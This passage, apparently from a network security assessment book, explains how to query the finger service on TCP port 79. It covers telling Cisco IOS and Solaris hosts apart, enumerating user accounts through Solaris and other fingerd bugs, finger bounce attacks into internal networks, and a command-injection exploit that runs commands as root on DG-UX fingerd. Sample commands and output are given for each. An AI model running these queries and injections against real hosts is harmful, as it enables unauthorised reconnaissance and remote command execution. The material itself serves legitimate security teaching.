The fingerd service is commonly found listening on TCP port 79 of Cisco IOS routers. Default out-of-box builds of many commercial Unix-based systems also run the service, including Solaris and BSDI. The service can be queried using a finger client (found in most operating platforms) or by directly using telnet to connect to port 79. Two examples of this follow, in which I show the differences in results from querying a Cisco IOS device and a Solaris server. Here's a finger query against a Cisco router using telnet: # telnet 192.168.0.1 79 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 192.168.0.252 Se0 Sync PPP 00:00:00 Connection closed by foreign host. Here the finger command queries a Solaris host: # finger @192.168.0.10 [192.168.0.10] Login Name TTY Idle When Where crm Chris McNab pts/0 1 Tue 09:08 onyx axd Andrew Done pts/4 3d Thu 11:57 goofball A null query will result in the current users being shown under most fingerd services. From analyzing the format of the response, you can easily differentiate between a Sun Solaris host and a Cisco IOS router. 5.4.1 finger Information LeaksVarious information leak vulnerabilities exist in fingerd implementations. A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. Example 5-9 highlights a bug present in all Solaris releases up to Version 8; it lets you identify user accounts on the target system. Example 5-9. Gleaning user details through Solaris fingerd# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10 [192.168.0.10] Login Name TTY Idle When Where root Super-User console <Jun 3 17:22> :0 admin Super-User console <Jun 3 17:22> :0 daemon ??? < . . . . > bin ??? < . . . . > sys ??? < . . . . > adm Admin < . . . . > lp Line Printer Admin < . . . . > uucp uucp Admin < . . . . > nuucp uucp Admin < . . . . > listen Network Admin < . . . . > nobody Nobody < . . . . > noaccess No Access User < . . . . > nobody4 SunOS 4.x Nobody < . . . . > informix Informix User < . . . . > crm Chris McNab pts/0 1 Tue 09:08 onyx axd Andrew Done pts/4 3d Thu 11:57 goofball Many Unix fingerd services perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd file; the following finger command-line options can obtain useful information: finger 0@target.host finger .@target.host finger **@target.host finger user@target.host finger test@target.host Performing a finger user@target.host request is especially effective against Linux, BSD, Solaris, and other Unix systems, because it often reveals a number of user accounts, as shown in Example 5-10. Example 5-10. Gathering user details through standard fingerd services# finger user@192.168.189.12 Login: ftp Name: FTP User Directory: /home/ftp Shell: /bin/sh Never logged in. No mail. No Plan. Login: samba Name: SAMBA user Directory: /home/samba Shell: /bin/null Never logged in. No mail. No Plan. Login: test Name: test user Directory: /home/test Shell: /bin/sh Never logged in. No mail. No Plan. 5.4.2 finger RedirectionIn some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details as follows: # finger @192.168.0.10@217.34.17.200 [217.34.217.200] [192.168.0.10] Login Name TTY Idle When Where crm Chris McNab pts/0 1 Tue 09:08 onyx axd Andrew Done pts/4 3d Thu 11:57 goofball 5.4.3 Directly Exploitable finger BugsPoorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems). Example 5-11 shows a vulnerable finger service running on a DG-UX platform being exploited to return the current user ID and network statistics. Example 5-11. Executing commands through DG-UX fingerd# finger "|/bin/id@192.168.0.135" [192.168.0.135] uid=0(root) gid=0(root) # finger "|/bin/ls -a /@192.168.0.135" [192.168.0.135] total 7690 drwxr-xr-x 15 root root 512 Jul 22 2002 . drwxr-xr-x 15 root root 512 Jul 22 2002 .. drwxr-xr-x 2 root bin 1024 Mar 1 2002 bin -r-xr-xr-x 1 root wheel 53248 Feb 19 2002 boot drwxr-xr-x 4 root wheel 15360 Jun 26 09:50 dev drwxr-xr-x 18 root wheel 2560 Oct 12 03:32 etc drwxr-xr-x 9 root wheel 512 Oct 12 03:25 home drwxr-xr-x 4 root wheel 512 Apr 10 2002 mnt drwx------ 24 root root 1536 Jun 26 09:41 root drwxr-xr-x 2 root bin 2048 Oct 18 2001 sbin drwxr-xr-x 2 root wheel 512 Oct 18 2001 stand lrwxr-xr-x 1 root wheel 12 Mar 16 2002 sys -> /usr/src/sys drwxrwxrwt 4 root wheel 512 Oct 20 18:05 tmp drwxr-xr-x 15 root wheel 512 Oct 18 2001 usr drwxr-xr-x 25 root wheel 512 May 23 2002 var Serious buffer overflow vulnerabilities exist in many Linux finger daemons, including cfingerd. At the time of writing, cfingerd 1.4.3 and prior running on Linux (particularly Debian and Red Hat Linux distributions) is especially susceptible to a plethora of remote and locally exploitable bugs. For current details of publicly available finger exploits, you can search Packet Storm for "finger exploit" or the MITRE CVE list at http://cve.mitre.org. |